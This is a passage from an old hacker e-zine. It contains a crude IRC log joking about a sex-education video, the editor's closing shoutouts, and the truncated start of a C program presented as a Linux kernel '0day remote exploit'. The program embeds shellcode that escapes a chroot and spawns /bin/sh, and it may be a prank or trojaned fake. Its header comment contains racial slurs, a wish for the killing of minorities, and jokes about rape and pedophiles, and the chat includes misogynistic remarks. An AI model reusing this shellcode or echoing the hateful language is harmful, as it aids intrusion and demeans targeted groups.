<+Rane> It's back! [21:52] <@k-rad-bob> LOL@that poor flash intro" [21:52] <@k-rad-bob> ! [21:52] <+pinkboi> seriosly [21:52] <+Rane> Uhh [21:52] <+Rane> Big naked dolls. [21:52] <+prieft> OMG [21:52] <+prieft> THEY HAVE A VIDEO [21:52] <+Rane> HAHA [21:52] <+pinkboi> haha...wow doesn't that stick out..."THE VAGINA" [21:52] <+Rane> YOU GUSY CAN WATCH IT WITH ME [21:52] <+prieft> http://exn.ca/sexfiles/Templates/VideoPopup.cfm?clip=/news/video/20001108- sf2000-dodson.asx [21:52] <+Rane> err [21:52] <+Rane> GUYS [21:53] <+optimum> "I now proclaim that mastrubation has come of age" [21:53] <+pinkboi> OMG THERES ThE BLUE hAIRED CHICK [21:53] <+Rane> Is it the whole video? [21:53] <+Rane> AHH! [21:53] <+Rane> YES! [21:53] <+Rane> SEE! [21:53] <+optimum> lol [21:53] <+Rane> I'm at the part with these $5000 lifelike dolls [21:54] <+optimum> "fantasy for flesh" "when it comes to giving yourself a hand it's often the thought that counts" [21:54] <+optimum> LOL [21:54] <+CodeMason> lol! [21:54] <+Rane> (nude female ones) [21:54] <+prieft> yeh [21:54] * +CodeMason goes out and buys "they joys of selfloving" [21:54] <+prieft> Rane: www.realdoll.com [21:54] <+optimum> OMFG [21:54] <+prieft> go there :P [21:54] <+CodeMason> *the [21:54] <+Rane> Find the part I said about the mom teaching the 14 year old! [21:54] <+optimum> CRACKERS, FLAKES AND THE HISTORY OF MASTURBATION [21:54] <+optimum> Graham crackers and Kellogg's Corn Flakes are household items today. A century ago, they were weapons in a religious war on masturbation. [21:54] *** fro (fro@24-216-125-115.hsacorp.net) Quit ((dm): out._) [21:54] <+Rane> AHHH! [21:54] <+Rane> A MALE DOLL! [21:54] <+Rane> EW [21:54] <+CodeMason> gross [21:54] <+Rane> lmao cartoons! [21:54] <+Rane> BAAAHAHAHA [21:54] <+Rane> THE GUY JUST MASTURBATED WITH HIS LAPTOP [21:54] *** c0redump (~c0redump@had.tea.and.crumpets.while.you.got.r00 ted.org.uk) has joined #b0g [21:54] <+Rane> Cartoons are funny. [21:54] *** Beep sets mode: +v c0redump [21:55] <+CodeMason> lol!!!!! [21:55] <+pinkboi> wtf??! [21:55] <+optimum> with his laptop? how do i do this? [21:55] <+Rane> Cybersex suits? [21:55] <+c0redump> b0w. [21:55] <+prieft> he prolly got that fufme.com device [21:55] <+prieft> :P [21:56] <+Rane> Oh whee, more cartoons [21:56] <+optimum> that thing is fucking weird [21:56] <+optimum> i wouldn't put my dick in it [21:56] <+Rane> I don't get it. [21:56] <+CodeMason> gross! [21:56] <+pinkboi> might get lopped off? [21:56] <+Rane> Whoa, those are like 1920s vibrators [21:56] <+CodeMason> look at some of the future show titles [21:56] <+CodeMason> "sexual juices" [21:56] <+CodeMason> "intersexed people" [21:56] <+CodeMason> "the rear end" [21:56] <+optimum> lol [21:56] <+pinkboi> haha [21:56] <+optimum> i wanna see #3 [21:57] <+CodeMason> yeah [21:57] <+CodeMason> :D~~~~~ [21:57] <+optimum> what did girls use as vibrators in the '20s? [21:57] <+Rane> AHH [21:57] <+Rane> OLD LADY MASTURBATING [21:57] <+Rane> FAT OLD LADY [21:57] *** jess-out (~jess@ Quit [21:57] <+pinkboi> AHHHHHH!!!!!! [21:57] <+pinkboi> *cower* [21:57] <+optimum> ewwwww [21:58] <+CodeMason> lol [21:58] <+Rane> Aww its over [21:58] <+CodeMason> they have a random factoid ticker [21:58] <+CodeMason> Shocking but true [21:58] <+CodeMason> Married men masturbate more than married women. [21:58] <+pinkboi> wow...amazing [21:59] <+CodeMason> Good old dirty fun [21:59] <+CodeMason> The word masturbation is derived from a Latin word which means "to pollute oneself". [21:59] <+Rane> I think that log should be in the next b0g. [21:59] <+optimum> if i have to mastrubate while married i'll divorce the untalented bitch [21:59] <+pinkboi> definatly [21:59] <+prieft> SOMEONE POINT HIS FUCKING WEBCAM ON HIS TV AND TURN IT ON AND TELL ME THE ADDY [21:59] <+pinkboi> haha [21:59] *** c0redump (~c0redump@had.tea.and.crumpets.while.you.got.r00ted.org.uk) has left #b0g [21:59] <+pinkboi> lol [21:59] <+prieft> GN0W [21:59] <+Rane> k-rad-bob [21:59] <+Rane> Put that in the next bog! [22:00] <@k-rad-bob> im too drunk to pay attention! [22:00] <+optimum> lol [22:00] <@k-rad-bob> email it to me! [22:00] <+Rane> ok [22:00] *** Abusive sets mode: +l 31 [22:00] <+CodeMason> OMFG LOL!!! [22:00] <+CodeMason> Good old dirty fun [22:00] <+CodeMason> The word masturbation is derived from a Latin word which means "to pollute oneself". [22:00] <+CodeMason> damn [22:00] <+Rane> fuck [22:00] <+CodeMason> Doing it til you're blue in the face [22:00] <+CodeMason> Autoerotic asphyxiation -- the term to describe temporarily suffocating oneself while masturbating -- claims somewhere between 250 and 1,000 people a year [22:00] <+prieft> well nofx is right [22:00] <+Rane> was anyone logging? b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [22:. - [ closing words ] [k-rad-bob] :. ] [k-rad-bob@b0g.org] :. ] ____________________________________________________________________ My deepest apologies to everyone that has been waiting so long for this issue. Other then the fact that me, myself and the rest of the contributors are lazy gimps, I don�t have many valid excuses. We moved from www.pcisd.com to our very own server, thanks to solar, we all love you! Which caused some delay since we were forced to rebuild some of the site. Now, if you want to see the next issue released this year you besta get your act together and write us some articles! Remember, b0g lives because of you. Much love goes out to everyone that contributed to this and past issues, everyone that is thinking of doing so, everyone that fears, you for reading this, everyone in #b0g on undernet, samn, stefano, gyrate, val, leah and the rest of the gimps at www.survivorer.com <-- go there and root for me! I'm one of now 9 people that might win a million bucks!%@! Everyone that visits our site, everyone that links our site! Stile, solar, progen and the gimps at progenic.com, the gimps at alldas.de, shizniz and the gimps at hack-net.com, alan and the gimps at packetstorm, everyone who mirrors our superdastic zine, everyone who sends me emails, everyone who listens to my crazy ramblings on irc, everyone who doesn�t laugh at me when I pass them, chicks who doesnt turn around and hit me when I grope a feel of them at clubs or concerts, the guy who planed to assassinate N�sync, Rloxley, the feds who hang on irc, tak�s mom for giving birth to him, dade murphy and the guys at 2600 for bringing us the coolest movie ever! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! /* * * 0day remote exploit for all linux distributions with * kernel 2.2 or 2.4 * * By: Rloxley * * shoutoutz: SSG, gov-boi, Solar Designer, ISS, EHAP, and * Mary from 10th grade that let me hold her * hand (it was the first time I ejaculated)... * I miss you, baby ...sorry about the mess * * fuckj00z: OpenBSD Team - trying to compete with my * favorite OS, Windows. Give * it up, lamers, OpenBSD will * never be as secure as NT. * God - he made me ugly... * and stupid * Pedophiles - becuz they never raped me when * I was a ./kid * b0g - sexy hackers that get me horny and make * me get off my lazy ass and masturbate * racists - for being lazy the last 50 years * and not killing all those damn jews, * niggers, chinks, etc... * */ #include #include #include #include #include #define PORT 31337 /* DO NOT CHANGE! */ char linuxcode[]= /* leet shellcode I wrote */ "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb" "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31" "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27" "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31" "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d" "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46" "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8" "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff" "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31"; int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; struct sockaddr_in serv_addr; struct sockaddr_in client_addr; int main (int argc, char *argv[]) { int i; int cabbage; /* mmm mmm... i love cock ..err.. cabbage */ if(argc != 2) { printf("\nUsage: %s \n\n", argv[0]); exit(-1); } printf("\n:: Ultimate linux spl0it ::\n\n"); printf("By: Rloxley\n"); printf("#hackphreak @ undernet\n\n"); printf("0wning %s...\n",argv[1]); for(i=0; i